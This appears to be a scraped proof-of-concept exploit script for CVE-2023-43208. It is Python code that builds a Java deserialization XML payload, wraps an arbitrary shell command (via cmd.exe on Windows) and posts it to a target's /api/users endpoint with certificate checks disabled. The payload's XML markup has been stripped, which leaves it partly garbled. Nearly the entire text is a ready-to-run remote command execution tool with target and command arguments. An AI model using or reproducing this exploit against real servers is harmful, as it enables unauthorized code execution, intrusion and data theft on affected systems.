import argparse import requests urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generate_payload(command, platform): if platform.lower() == "win": cmd = f"cmd.exe /c \"{command}\"" else: cmd = f"{command}" xml_payload = f""" ABCD

java.lang.Comparable java.lang.Runtime getMethod

java.lang.String

[Ljava.lang.Class;

getRuntime

invoke

java.lang.Object

[Ljava.lang.Object;

exec

java.lang.String

{cmd} transform compareTo

""" return xml_payload def exploit(target_url, command, platform): payload = generate_payload(command, platform) headers = { 'Content-Type': 'application/xml', 'X-Requested-With': 'OpenAPI' } try: response = requests.post(f"{target_url}/api/users", data=payload, headers=headers, verify=False) if response.status_code == 500: print("The target appears to have executed the payload.") else: print("Failed to execute the payload.") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") def main(): parser = argparse.ArgumentParser(description='Exploit script for CVE-2023-43208.') parser.add_argument('-c', '--command', required=True, help='Command to execute on the target system.') parser.add_argument('-u', '--url', required=True, help='Target URL.') parser.add_argument('-p', '--platform', default='unix', choices=['unix', 'win'], help='Target platform (default: unix).') args = parser.parse_args() exploit(args.url, args.command, args.platform) if __name__ == "__main__": main()

PoC video

Summary

Description